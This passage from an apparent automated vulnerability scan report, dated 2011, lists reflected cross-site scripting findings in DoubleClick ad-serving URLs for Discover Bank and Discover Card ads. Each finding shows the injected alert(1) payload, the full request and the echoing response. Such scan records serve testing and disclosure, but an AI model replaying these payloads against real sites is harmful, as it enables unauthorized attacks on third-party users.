GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=c2b90'-alert(1)-'b8a211ccb10 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4829
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 01:30:26 GMT
Expires: Tue, 28 Jun 2011 01:30:26 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=c2b90'-alert(1)-'b8a211ccb10http://fb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx?acmpgn=111_X1_300x250_feel_X1FEELA&src=X1FEELA';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/22
...[SNIP]...

1.71. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff824'-alert(1)-'e40b80e5cff was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0cff824'-alert(1)-'e40b80e5cff&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4644
Date: Tue, 28 Jun 2011 01:29:00 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
;
var dcgif = 'http://s0.2mdn.net/2279893/build_osa_300x250.gif';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0cff824'-alert(1)-'e40b80e5cff&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUI
...[SNIP]...

1.72. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6436'-alert(1)-'d8cc99c698b was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852f6436'-alert(1)-'d8cc99c698b&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4313
Date: Tue, 28 Jun 2011 02:17:18 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
FINAL_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852f6436'-alert(1)-'d8cc99c698b&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'ht
...[SNIP]...

1.73. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fc7c'-alert(1)-'e931caa6fc4 was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=369835fc7c'-alert(1)-'e931caa6fc4&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4297
Date: Tue, 28 Jun 2011 02:18:22 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
tivewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=369835fc7c'-alert(1)-'e931caa6fc4&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/display%3FpageFileId%3Dmore15%26sc%3DKBC6';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0
...[SNIP]...

1.74. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f42d'-alert(1)-'97132edf540 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=171848565f42d'-alert(1)-'97132edf540&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4194
Date: Tue, 28 Jun 2011 02:18:01 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
ar dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=171848565f42d'-alert(1)-'97132edf540&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/
...[SNIP]...

1.75. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_eo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a976'-alert(1)-'0dc5b971d37 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=979566a976'-alert(1)-'0dc5b971d37&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4194
Date: Tue, 28 Jun 2011 02:16:31 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
= 'http://s0.2mdn.net/1796512/CB300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=979566a976'-alert(1)-'0dc5b971d37&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112';
var target = '_blank';
var
...[SNIP]...

1.76. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_et parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3599e'-alert(1)-'ee68f7e2a73 was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=13092273103599e'-alert(1)-'ee68f7e2a73&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4313
Date: Tue, 28 Jun 2011 02:16:50 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
12/OpenRoad_FINAL_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=13092273103599e'-alert(1)-'ee68f7e2a73&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6';
var target = '_blank';
var dcbgcolor = '';
var
...[SNIP]...

1.77. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19ef6'-alert(1)-'386b12da849 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
